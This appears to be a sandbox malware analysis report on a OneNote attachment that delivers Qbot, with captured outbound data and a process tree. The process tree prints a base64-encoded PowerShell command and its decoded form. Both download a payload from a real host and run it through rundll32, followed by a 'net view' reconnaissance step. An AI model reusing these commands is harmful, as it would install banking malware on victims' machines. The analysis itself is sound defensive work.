                                                                                                                                                                                                              Data Ascii: TP3cdp00ZKYs3kF1aV90WQFLyvbZk7GvTC3YkfPRS+N1LwnkxNe4zyea+T7LojxJccg99Nj+I9Th9Yv0npX/NZ1VMlRbrhAu8B6deIMICA+Lp602ibeip5mUqXptwKgKmbzfxOsoPQw7mnkmZbx60U3P5fMYbaeigaUMhOHCtCI9rtOTeK6OQoyrjdKy0ht74iEzphwq/zxQC80NMERv+P+kQbHutrdPURiGh3WzcZcrO0pmmOKzoOVvnmKjhQn
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC14353OUTData Raw: 38 49 63 4c 6f 57 61 37 62 77 37 6a 70 46 6d 73 58 67 6a 6d 4e 6b 71 77 61 77 79 6c 2f 54 71 64 30 4e 47 37 2b 6e 2b 56 32 51 49 49 4b 76 72 38 4c 52 74 52 71 58 61 58 43 45 52 64 62 44 66 4f 7a 46 58 4f 72 67 67 54 64 48 67 50 31 49 45 52 4f 75 54 37 48 4f 4b 42 6a 49 4c 59 5a 5a 68 68 57 72 67 39 79 5a 5a 6b 69 32 4e 55 38 57 6e 70 41 58 72 45 32 75 44 69 48 54 49 62 61 39 36 33 39 72 35 48 44 2f 45 75 51 43 31 31 75 42 6e 2f 2f 5a 4d 58 66 46 30 50 6a 6f 73 34 6b 54 77 57 43 4d 55 30 79 59 38 69 55 4b 76 62 51 76 37 59 41 56 67 30 44 67 77 4c 4d 6c 71 61 2f 56 47 38 78 41 62 6c 4a 31 4e 4a 73 72 50 70 46 5a 4c 35 6a 34 79 32 64 7a 45 55 30 59 66 6b 75 6d 32 74 70 58 68 46 59 2f 4c 68 6e 44 78 6d 64 43 77 6b 4a 58 71 6a 6a 30 65 31 6d 4d 70 56 4c 4a 42
                                                                                                                                                                                                              Data Ascii: 8IcLoWa7bw7jpFmsXgjmNkqwawyl/Tqd0NG7+n+V2QIIKvr8LRtRqXaXCERdbDfOzFXOrggTdHgP1IEROuT7HOKBjILYZZhhWrg9yZZki2NU8WnpAXrE2uDiHTIba9639r5HD/EuQC11uBn//ZMXfF0Pjos4kTwWCMU0yY8iUKvbQv7YAVg0DgwLMlqa/VG8xAblJ1NJsrPpFZL5j4y2dzEU0Yfkum2tpXhFY/LhnDxmdCwkJXqjj0e1mMpVLJB
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC14369OUTData Raw: 64 2b 4f 68 50 6b 4d 2b 54 36 4c 57 71 32 42 33 66 77 4d 79 58 39 39 50 66 55 77 63 33 6d 73 6f 35 58 6f 4a 57 6f 4c 30 6a 64 69 4c 42 41 62 61 45 4f 52 47 70 64 53 4f 6b 54 4d 79 56 50 70 74 46 52 2f 41 59 5a 66 4f 59 5a 2f 50 6d 6c 52 30 2b 75 58 36 49 6d 78 73 55 41 32 45 7a 4b 63 44 39 61 73 35 6c 4c 6b 71 67 75 35 57 77 56 56 36 39 73 6e 68 6f 67 44 54 64 68 6b 46 6c 6b 64 39 36 46 74 6d 4e 5a 31 44 4c 52 39 66 5a 49 44 66 66 35 31 32 47 4a 74 7a 45 74 71 39 31 71 66 54 37 36 49 56 79 73 76 5a 66 46 44 33 76 47 66 43 2f 72 36 7a 6f 4f 69 36 63 58 4b 52 34 70 47 64 58 75 74 75 53 68 52 2b 2b 61 46 72 33 32 34 71 33 57 4e 55 33 59 41 46 65 34 4f 67 31 33 76 5a 45 43 50 65 5a 6f 51 61 67 73 7a 47 34 6a 6c 6e 69 42 6f 77 6e 35 70 76 52 4c 50 2f 58 52 76
                                                                                                                                                                                                              Data Ascii: d+OhPkM+T6LWq2B3fwMyX99PfUwc3mso5XoJWoL0jdiLBAbaEORGpdSOkTMyVPptFR/AYZfOYZ/PmlR0+uX6ImxsUA2EzKcD9as5lLkqgu5WwVV69snhogDTdhkFlkd96FtmNZ1DLR9fZIDff512GJtzEtq91qfT76IVysvZfFD3vGfC/r6zoOi6cXKR4pGdXutuShR++aFr324q3WNU3YAFe4Og13vZECPeZoQagszG4jlniBown5pvRLP/XRv
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC14385OUTData Raw: 6d 75 62 56 59 31 79 39 74 36 76 42 54 55 50 70 77 42 2b 35 6e 72 6b 57 30 4f 6d 7a 4f 54 6d 59 32 50 58 6d 34 69 61 62 67 30 51 67 67 32 68 74 6f 67 41 39 30 2b 71 48 32 2b 79 43 63 61 5a 76 4f 6a 37 38 63 77 41 58 52 46 59 6c 37 52 63 31 30 74 4c 67 4d 63 6d 38 74 63 74 30 52 43 44 41 4d 49 61 69 6c 2f 6f 50 6b 61 62 6d 41 6f 50 50 68 33 76 68 33 75 63 45 46 76 56 4c 55 4b 69 6e 5a 63 73 46 67 5a 43 6f 6b 31 35 6d 55 4a 75 4b 76 6b 51 36 47 31 6e 68 65 6b 69 55 36 79 4d 54 32 76 46 32 65 53 38 66 57 71 6f 70 38 71 72 74 76 6d 45 78 6d 44 6e 5a 44 78 76 65 56 39 43 32 2b 79 2b 35 6c 38 55 31 50 73 41 64 71 34 53 64 6f 43 69 72 6d 4c 69 73 61 33 61 34 30 67 41 68 77 30 6a 58 35 54 4d 2b 32 76 41 53 48 4a 74 58 47 51 47 6d 73 31 52 35 47 75 50 4e 4d 67 68
                                                                                                                                                                                                              Data Ascii: mubVY1y9t6vBTUPpwB+5nrkW0OmzOTmY2PXm4iabg0Qgg2htogA90+qH2+yCcaZvOj78cwAXRFYl7Rc10tLgMcm8tct0RCDAMIail/oPkabmAoPPh3vh3ucEFvVLUKinZcsFgZCok15mUJuKvkQ6G1nhekiU6yMT2vF2eS8fWqop8qrtvmExmDnZDxveV9C2+y+5l8U1PsAdq4SdoCirmLisa3a40gAhw0jX5TM+2vASHJtXGQGms1R5GuPNMgh
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC14401OUTData Raw: 38 35 66 38 64 65 67 63 61 52 65 36 6a 38 75 6e 6f 49 55 4b 31 38 55 33 69 61 49 5a 31 30 77 73 4f 52 79 6c 4f 6c 35 70 36 4d 52 42 63 4a 66 44 30 77 5a 6f 6f 39 37 52 51 34 67 49 38 46 43 34 57 41 44 2b 6a 6c 49 57 78 69 4e 4a 53 46 52 53 52 42 6d 4f 7a 4c 77 70 55 48 46 35 4e 4f 4f 38 44 69 56 32 37 71 4f 6a 72 6c 77 58 47 71 76 61 41 52 31 59 36 2f 32 58 35 6f 51 4b 42 75 79 4b 63 73 30 47 53 68 52 30 71 47 2b 69 4a 69 39 71 6e 32 2f 58 73 2b 52 56 6e 68 75 2b 75 75 55 57 30 41 41 68 76 48 65 4e 46 43 62 4e 74 4b 4d 33 4f 59 43 70 31 4f 6d 66 75 37 4d 71 42 32 46 73 5a 42 74 69 4a 42 70 57 7a 4f 75 55 32 6f 65 68 75 65 59 46 70 32 71 55 52 70 44 64 74 69 33 31 78 6f 56 64 6a 55 75 55 31 68 42 56 57 76 6b 45 61 63 6a 5a 63 46 43 54 33 42 33 34 51 65 53
                                                                                                                                                                                                              Data Ascii: 85f8degcaRe6j8unoIUK18U3iaIZ10wsORylOl5p6MRBcJfD0wZoo97RQ4gI8FC4WAD+jlIWxiNJSFRSRBmOzLwpUHF5NOO8DiV27qOjrlwXGqvaAR1Y6/2X5oQKBuyKcs0GShR0qG+iJi9qn2/Xs+RVnhu+uuUW0AAhvHeNFCbNtKM3OYCp1Omfu7MqB2FsZBtiJBpWzOuU2oehueYFp2qURpDdti31xoVdjUuU1hBVWvkEacjZcFCT3B34QeS
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC14417OUTData Raw: 36 46 67 4e 66 39 2b 68 36 6d 47 55 6a 53 54 67 42 4e 6d 2f 76 72 49 36 31 47 67 53 31 4e 48 72 55 6f 42 63 47 68 6f 4f 76 75 58 70 63 7a 68 57 43 38 4a 69 42 59 70 6b 4a 36 52 49 4e 45 6c 57 31 42 47 76 6d 5a 50 65 30 75 56 45 59 34 30 78 68 43 5a 2b 6b 74 78 68 36 39 70 31 71 59 51 5a 65 38 71 54 34 75 71 4f 56 32 69 56 75 4b 41 65 71 5a 45 4c 52 6a 73 59 73 64 41 4b 71 45 46 35 66 78 53 6e 79 68 30 48 46 75 34 39 78 62 4b 36 65 59 4f 53 74 70 6f 50 51 2f 38 6d 34 44 78 7a 34 74 62 43 71 51 68 50 57 54 65 33 72 33 52 6a 34 6a 59 73 74 64 6b 53 58 47 6e 33 4d 4d 68 6f 6b 67 49 46 74 53 56 38 4f 4f 46 53 32 50 33 65 47 51 77 65 73 37 73 4d 36 38 56 63 58 59 68 2b 70 30 46 72 39 47 6a 4c 74 4b 57 4b 79 63 75 55 61 2f 64 76 6b 51 75 54 64 36 48 73 69 75 44
                                                                                                                                                                                                              Data Ascii: 6FgNf9+h6mGUjSTgBNm/vrI61GgS1NHrUoBcGhoOvuXpczhWC8JiBYpkJ6RINElW1BGvmZPe0uVEY40xhCZ+ktxh69p1qYQZe8qT4uqOV2iVuKAeqZELRjsYsdAKqEF5fxSnyh0HFu49xbK6eYOStpoPQ/8m4Dxz4tbCqQhPWTe3r3Rj4jYstdkSXGn3MMhokgIFtSV8OOFS2P3eGQwes7sM68VcXYh+p0Fr9GjLtKWKycuUa/dvkQuTd6HsiuD
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC14433OUTData Raw: 7a 67 35 44 43 6e 33 41 43 34 4e 45 6e 63 73 52 79 70 56 69 5a 67 45 71 72 34 46 79 48 72 2f 46 44 4a 66 5a 79 45 6b 39 62 63 59 46 72 61 6b 39 73 75 4d 53 65 65 30 6f 4e 6f 53 46 61 4f 4b 62 7a 43 30 6d 58 35 6a 63 6a 6f 39 4f 45 34 4a 6e 4a 30 34 57 71 57 36 56 56 56 2f 44 76 57 50 33 33 46 39 5a 31 71 37 39 65 6f 31 79 30 52 50 42 43 4a 45 58 66 4c 6e 4e 50 73 54 67 37 48 7a 61 6c 55 44 38 38 67 73 36 70 66 2b 56 44 6a 6b 53 77 34 48 2b 75 30 2b 6f 75 5a 6c 31 5a 4b 75 59 50 5a 74 61 61 71 41 44 68 4a 50 4f 2f 49 49 51 52 69 4e 79 42 72 6a 48 36 76 76 42 57 6a 52 4f 2f 5a 52 59 58 63 72 31 64 58 4d 44 48 6b 36 77 6f 67 64 56 31 48 57 72 6f 66 47 4f 71 63 6f 51 4b 32 45 32 35 6b 62 68 4d 56 72 72 6a 4e 6b 72 32 7a 71 49 57 66 31 66 4c 52 72 4f 6a 6a 77
                                                                                                                                                                                                              Data Ascii: zg5DCn3AC4NEncsRypViZgEqr4FyHr/FDJfZyEk9bcYFrak9suMSee0oNoSFaOKbzC0mX5jcjo9OE4JnJ04WqW6VVV/DvWP33F9Z1q79eo1y0RPBCJEXfLnNPsTg7HzalUD88gs6pf+VDjkSw4H+u0+ouZl1ZKuYPZtaaqADhJPO/IIQRiNyBrjH6vvBWjRO/ZRYXcr1dXMDHk6wogdV1HWrofGOqcoQK2E25kbhMVrrjNkr2zqIWf1fLRrOjjw
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC14449OUTData Raw: 30 56 73 43 72 67 55 4d 49 52 41 61 59 68 42 48 47 33 36 66 69 61 65 65 78 51 4b 76 6a 6f 58 71 54 73 74 63 39 69 77 74 59 64 57 76 58 46 30 51 35 58 49 73 53 5a 71 45 49 64 78 78 73 49 33 58 33 34 45 75 6f 61 61 56 39 4d 75 53 38 41 7a 70 38 32 31 4e 2f 54 6b 42 4a 31 4e 6a 74 44 34 61 55 66 73 39 73 4c 33 49 72 58 6b 55 4c 43 32 62 31 42 49 79 75 6a 50 64 76 6e 32 52 67 59 63 49 74 5a 52 39 37 6e 59 66 58 35 6c 67 67 30 2f 41 7a 75 55 45 72 35 76 64 61 41 2b 57 74 79 47 78 77 36 52 62 70 50 32 6f 57 4b 70 71 71 59 6c 57 67 72 5a 67 4b 48 64 76 4e 4e 44 73 33 62 2b 5a 41 67 79 74 74 79 35 74 51 4a 74 50 61 6f 58 53 36 48 41 56 50 6c 66 32 66 57 59 72 35 67 6c 61 75 6b 45 52 39 57 35 7a 47 55 6b 50 6e 6e 70 43 4d 73 39 71 4b 4d 77 4a 66 6e 47 35 61 42 6b
                                                                                                                                                                                                              Data Ascii: 0VsCrgUMIRAaYhBHG36fiaeexQKvjoXqTstc9iwtYdWvXF0Q5XIsSZqEIdxxsI3X34EuoaaV9MuS8Azp821N/TkBJ1NjtD4aUfs9sL3IrXkULC2b1BIyujPdvn2RgYcItZR97nYfX5lgg0/AzuUEr5vdaA+WtyGxw6RbpP2oWKpqqYlWgrZgKHdvNNDs3b+ZAgytty5tQJtPaoXS6HAVPlf2fWYr5glaukER9W5zGUkPnnpCMs9qKMwJfnG5aBk
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC14465OUTData Raw: 62 38 44 4c 61 43 2f 59 33 6a 50 71 6e 49 6f 6c 75 63 72 50 4c 4b 43 6e 51 6d 73 41 72 46 78 37 7a 62 7a 78 4b 51 48 74 39 66 74 65 71 7a 44 4b 6e 59 45 6c 30 35 50 36 4e 68 38 78 52 64 71 71 4f 74 6e 45 36 74 4c 5a 41 33 31 34 2b 63 4e 65 30 2b 61 49 61 34 39 71 79 32 79 52 6d 36 50 56 33 44 61 61 4e 42 62 5a 51 38 4b 2b 37 42 32 32 32 45 56 59 71 2b 39 52 47 2f 6f 6b 75 46 33 50 2b 6c 35 68 44 50 61 6b 58 6e 48 57 66 39 56 51 77 77 63 49 6c 6f 4f 6a 74 42 6e 44 47 36 75 44 48 74 75 59 56 53 53 66 7a 2b 6c 51 62 4c 41 68 4e 79 49 4d 68 41 49 4b 36 65 61 7a 57 42 6e 50 6d 58 39 55 42 47 2b 43 58 75 30 57 54 52 4e 43 50 31 74 32 44 4a 47 6f 5a 6f 64 34 39 37 6c 72 65 33 62 34 6d 4c 55 39 76 39 4f 38 36 70 49 70 6a 37 75 4d 43 47 66 6e 32 58 68 38 4f 65 38
                                                                                                                                                                                                              Data Ascii: b8DLaC/Y3jPqnIolucrPLKCnQmsArFx7zbzxKQHt9fteqzDKnYEl05P6Nh8xRdqqOtnE6tLZA314+cNe0+aIa49qy2yRm6PV3DaaNBbZQ8K+7B222EVYq+9RG/okuF3P+l5hDPakXnHWf9VQwwcIloOjtBnDG6uDHtuYVSSfz+lQbLAhNyIMhAIK6eazWBnPmX9UBG+CXu0WTRNCP1t2DJGoZod497lre3b4mLU9v9O86pIpj7uMCGfn2Xh8Oe8
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC14481OUTData Raw: 53 57 32 2b 78 69 5a 30 4c 68 7a 41 57 59 63 4b 7a 4d 6e 67 34 51 69 6a 64 53 69 6c 43 4a 63 6f 71 2b 68 67 36 7a 55 69 6d 32 45 65 61 31 6a 36 32 45 53 56 74 6a 64 58 34 61 65 4b 6f 54 6c 4a 50 33 67 44 30 33 78 54 4b 6c 6d 33 57 2f 57 7a 77 4a 46 59 43 68 4e 69 41 72 63 63 54 5a 63 51 6e 78 42 51 4e 6c 73 61 70 66 6a 74 4a 70 59 6d 53 42 6f 4d 4d 5a 72 44 45 74 4d 4a 47 67 4e 38 48 75 4f 69 66 64 68 6f 42 7a 62 4f 74 73 6c 4e 44 39 48 6f 46 37 50 52 65 48 54 50 73 42 41 7a 4a 6f 46 71 78 6c 38 46 66 47 63 63 37 6b 4e 72 79 36 59 34 36 59 77 44 39 57 34 51 64 45 4f 67 62 74 52 42 49 43 4e 54 36 38 4c 6c 63 37 69 43 56 4a 4d 6b 42 6c 4b 46 48 62 66 51 5a 72 54 65 42 74 56 76 62 2f 6e 59 43 74 2f 65 6b 43 68 6e 31 37 72 63 5a 73 34 67 4b 71 59 66 66 75 55
                                                                                                                                                                                                              Data Ascii: SW2+xiZ0LhzAWYcKzMng4QijdSilCJcoq+hg6zUim2Eea1j62ESVtjdX4aeKoTlJP3gD03xTKlm3W/WzwJFYChNiArccTZcQnxBQNlsapfjtJpYmSBoMMZrDEtMJGgN8HuOifdhoBzbOtslND9HoF7PReHTPsBAzJoFqxl8FfGcc7kNry6Y46YwD9W4QdEOgbtRBICNT68Llc7iCVJMkBlKFHbfQZrTeBtVvb/nYCt/ekChn17rcZs4gKqYffuU
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC14497OUTData Raw: 75 4b 66 31 6b 32 53 43 59 2f 45 59 5a 55 55 6b 37 6a 63 35 68 46 54 46 6c 48 4c 49 46 4b 46 48 37 4e 6f 31 4b 41 62 57 74 57 6f 46 41 34 4d 77 78 32 55 6b 58 4d 72 54 49 54 72 62 52 73 34 35 6a 4a 42 58 57 67 37 6c 64 45 34 58 42 76 71 4f 4d 61 47 72 6d 4d 55 72 68 6a 43 32 67 38 4d 4c 65 4f 37 42 49 66 55 69 46 66 65 71 54 76 6a 31 6c 4e 78 6b 78 7a 5a 58 2b 67 59 63 71 2f 32 34 31 35 6d 46 70 41 46 68 63 71 2f 47 68 69 56 4a 38 34 36 36 64 72 42 61 41 62 35 65 5a 4b 52 39 53 48 52 6c 43 45 6f 46 77 58 57 32 68 49 6b 69 45 68 64 71 6f 31 5a 45 76 52 72 41 39 79 4b 75 64 64 74 6d 4f 47 31 49 56 43 37 75 4b 67 61 39 50 4d 6e 61 68 76 46 2f 2b 72 64 36 68 4b 4c 4f 38 39 56 4b 73 75 5a 74 35 4c 51 6c 67 55 32 66 77 62 46 4c 6b 31 75 70 59 2f 50 30 63 37 32
                                                                                                                                                                                                              Data Ascii: uKf1k2SCY/EYZUUk7jc5hFTFlHLIFKFH7No1KAbWtWoFA4Mwx2UkXMrTITrbRs45jJBXWg7ldE4XBvqOMaGrmMUrhjC2g8MLeO7BIfUiFfeqTvj1lNxkxzZX+gYcq/2415mFpAFhcq/GhiVJ8466drBaAb5eZKR9SHRlCEoFwXW2hIkiEhdqo1ZEvRrA9yKuddtmOG1IVC7uKga9PMnahvF/+rd6hKLO89VKsuZt5LQlgU2fwbFLk1upY/P0c72
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC14513OUTData Raw: 69 51 6d 54 66 2f 58 54 69 31 53 58 74 5a 64 43 54 77 43 62 7a 6c 65 72 4b 6e 34 68 44 36 31 33 66 49 2b 66 73 38 67 33 79 36 4a 39 32 34 78 74 71 71 4a 47 79 30 54 55 2b 7a 51 7a 2b 48 31 7a 34 4a 61 36 76 6b 37 37 4e 34 74 45 51 55 33 43 6d 4c 79 68 41 65 43 41 57 4f 62 58 4a 4b 73 78 79 46 78 49 77 36 67 69 42 45 56 46 66 39 39 45 61 6d 31 68 69 41 68 48 74 55 64 30 47 38 35 52 69 62 55 48 6a 49 7a 6c 33 6a 2b 30 75 6e 6e 58 6f 55 79 33 5a 44 77 2b 77 54 6f 30 6c 78 31 49 30 4e 2f 61 57 33 38 5a 66 35 76 4b 6c 42 6b 30 79 4d 5a 65 61 4b 72 6c 37 57 39 7a 62 4f 65 4d 58 7a 47 6f 42 32 52 72 72 49 36 33 45 33 6d 54 54 49 34 67 55 43 71 4d 32 49 79 53 5a 2b 5a 6f 72 79 6c 70 51 38 6c 70 39 53 34 66 70 2f 4b 64 52 44 75 37 51 78 5a 72 57 58 4b 4b 6a 54 67
                                                                                                                                                                                                              Data Ascii: iQmTf/XTi1SXtZdCTwCbzlerKn4hD613fI+fs8g3y6J924xtqqJGy0TU+zQz+H1z4Ja6vk77N4tEQU3CmLyhAeCAWObXJKsxyFxIw6giBEVFf99Eam1hiAhHtUd0G85RibUHjIzl3j+0unnXoUy3ZDw+wTo0lx1I0N/aW38Zf5vKlBk0yMZeaKrl7W9zbOeMXzGoB2RrrI63E3mTTI4gUCqM2IySZ+ZorylpQ8lp9S4fp/KdRDu7QxZrWXKKjTg


                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                              Start time:19:48:24
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Note.one
                                                                                                                                                                                                              Imagebase:0x7ff7dd690000
                                                                                                                                                                                                              File size:2383176 bytes
                                                                                                                                                                                                              MD5 hash:59056F600C4366EE07277C20A90DAF67
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:low

                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                              Start time:19:48:25
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:/tsr
                                                                                                                                                                                                              Imagebase:0x7ff7bf0f0000
                                                                                                                                                                                                              File size:180528 bytes
                                                                                                                                                                                                              MD5 hash:377069572D48FFBF1EA2DA466A61B398
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:low

                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                              Start time:19:48:27
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Open.cmd" "
                                                                                                                                                                                                              Imagebase:0x7ff73f700000
                                                                                                                                                                                                              File size:289792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:moderate

                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                              Start time:19:48:27
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff6553c0000
                                                                                                                                                                                                              File size:875008 bytes
                                                                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                              Start time:19:48:27
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3Rhc3NvaW5tb2JpbGlhcmlhLmNvbS81NkcwLzAxLmdpZiAtT3V0RmlsZSBDOlxwcm9ncmFtZGF0YVxwdXR0eS5qcGcNCnJ1bmRsbDMyIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZyxXaW5kDQpleGl0DQo='))
                                                                                                                                                                                                              Imagebase:0x7ff7c0220000
                                                                                                                                                                                                              File size:452608 bytes
                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                              Reputation:moderate

                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                              Start time:19:48:30
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd
                                                                                                                                                                                                              Imagebase:0x7ff73f700000
                                                                                                                                                                                                              File size:289792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                              Start time:19:48:30
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff6553c0000
                                                                                                                                                                                                              File size:875008 bytes
                                                                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                              Start time:19:48:30
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:powershell Invoke-WebRequest -URI https://tassoinmobiliaria.com/56G0/01.gif -OutFile C:\programdata\putty.jpg
                                                                                                                                                                                                              Imagebase:0x7ff75d3a0000
                                                                                                                                                                                                              File size:452608 bytes
                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:.Net C# or VB.NET

                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                              Start time:19:48:33
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:rundll32 C:\programdata\putty.jpg,Wind
                                                                                                                                                                                                              Imagebase:0x7ff782ec0000
                                                                                                                                                                                                              File size:71680 bytes
                                                                                                                                                                                                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                              Start time:19:48:34
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:rundll32 C:\programdata\putty.jpg,Wind
                                                                                                                                                                                                              Imagebase:0xe90000
                                                                                                                                                                                                              File size:61440 bytes
                                                                                                                                                                                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000D.00000002.5726437418.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                              Start time:19:48:36
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\backgroundTaskHost.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\backgroundTaskHost.exe
                                                                                                                                                                                                              Imagebase:0x200000
                                                                                                                                                                                                              File size:17728 bytes
                                                                                                                                                                                                              MD5 hash:F290D12F0351B56708B3DF1EC26CB45B
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                              Start time:19:48:38
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE" /tsr
                                                                                                                                                                                                              Imagebase:0x7ff7bf0f0000
                                                                                                                                                                                                              File size:180528 bytes
                                                                                                                                                                                                              MD5 hash:377069572D48FFBF1EA2DA466A61B398
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                              Start time:19:52:13
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:net view
                                                                                                                                                                                                              Imagebase:0xb40000
                                                                                                                                                                                                              File size:47104 bytes
                                                                                                                                                                                                              MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                                                                                                                              Has elevated privileges:true
